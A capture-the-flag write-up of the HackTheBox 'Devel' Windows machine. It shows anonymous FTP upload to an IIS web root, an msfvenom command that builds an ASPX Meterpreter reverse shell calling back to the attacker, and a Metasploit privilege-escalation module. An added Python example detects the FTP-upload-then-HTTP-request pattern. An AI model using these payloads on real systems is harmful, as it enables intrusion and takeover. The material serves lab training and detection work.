HackTheBox Devel

Summary

Devel is an easy Windows machine from HackTheBox that demonstrates the risk of a misconfigured FTP service. The machine can be compromised using the Metasploit Framework.

Initial Enumeration

Enumerating all ports and services shows that only 2 ports are open on this machine:

  • 21 - FTP (running Microsoft ftpd with anonymous login enabled)
  • 80 - HTTP (running Microsoft IIS webserver version 7.5)

Devel Nmap

Foothold

The nmap result shows that anonymous login is enabled. Using the ftp command, log in to the FTP server using the following creds

Terminal window
ftp 10.10.10.5

FTP-Anonymous access

The FTP service is misconfigured: its root path lists all of the IIS webserver contents, with read and write privileges on the directory.

Using MSFvenom, create an ASPX payload and upload it into the FTP directory

Terminal window
msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=9001 -f aspx -o cmd.aspx

ASPX Payload Generation

Launch the Metasploit Framework and use the multi/handler module to set up the Meterpreter listener

MSF Console

From the webserver, trigger the cmd.aspx shell and we will get the reverse shell in msfconsole

Meterpreter Shell
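
From the defender's side, the foothold above leaves a recognisable pair of events: a script file written over FTP, then the same file requested over HTTP. The following is an added example, not part of the original write-up, that correlates the two logs; it assumes both are in W3C extended format with a `#Fields:` header and that the FTP root is the web root (as on this machine). The log lines and the function names are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed sample logs in W3C extended format (not taken from the machine).
FTP_LOG = """#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2020-05-24 10:00:05 192.0.2.10 anonymous STOR cmd.aspx 226
2020-05-24 10:02:00 192.0.2.20 anonymous STOR notes.txt 226
2020-05-24 10:03:00 192.0.2.30 anonymous STOR test.aspx 550
"""
HTTP_LOG = """#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2020-05-24 09:59:00 192.0.2.99 - GET /iisstart.htm 200
2020-05-24 10:00:40 192.0.2.10 - GET /cmd.aspx 200
2020-05-24 10:05:00 192.0.2.99 - GET /notes.txt 200
2020-05-24 10:06:00 192.0.2.30 - GET /test.aspx 404
"""
# Extensions that IIS hands to a script handler instead of serving as static files.
SCRIPT_EXT = re.compile(r"\.(asp|aspx|ashx|asmx)$", re.I)
WRITE_CMDS = {"STOR", "STOU", "APPE"}  # FTP commands that write a file

def parse_w3c(text):
    """Yield one dict per record; column names come from the '#Fields:' line."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.strip() and not line.startswith("#") and fields:
            rec = dict(zip(fields, line.split()))
            rec["ts"] = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
            yield rec

def upload_then_request(ftp_log, http_log, window=timedelta(hours=24)):
    """Return (url, uploader_ip, requester_ip, delay) for every script file that was
    written over FTP (status 226) and then requested over HTTP within `window`."""
    uploads = {}
    for r in parse_w3c(ftp_log):
        url = "/" + r["cs-uri-stem"].lstrip("/").lower()  # assumes FTP root == web root
        if r["cs-method"].upper() in WRITE_CMDS and r["sc-status"] == "226" and SCRIPT_EXT.search(url):
            uploads[url] = r
    hits = []
    for r in parse_w3c(http_log):
        up = uploads.get(r["cs-uri-stem"].lower())
        if up and timedelta(0) <= r["ts"] - up["ts"] <= window:
            hits.append((r["cs-uri-stem"], up["c-ip"], r["c-ip"], r["ts"] - up["ts"]))
    return hits

if __name__ == "__main__":
    for url, src, dst, delay in upload_then_request(FTP_LOG, HTTP_LOG):
        print(f"ALERT {url}: uploaded by {src} over FTP, requested by {dst} after {delay}")
```

The rejected upload (status 550) and the static `notes.txt` are ignored, so only the script file that was both written and then requested raises an alert.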

Privilege Escalation

Once the shell is obtained, use the inbuilt privilege escalation module of MSF Console to recon the local PE exploits

Terminal window
use post/multi/recon/local_exploit_suggester


From the suggested exploits, we used the following one for privilege escalation and obtained the SYSTEM shell

Terminal window
windows/local/ms13_053_schlamperei


HackTheBox Devel
https://blog.0xdhinu.com/posts/devel-hackthebox/
Author: Dhinu Ramachandran
Published at: 2020-05-24
License: CC BY-NC-SA 4.0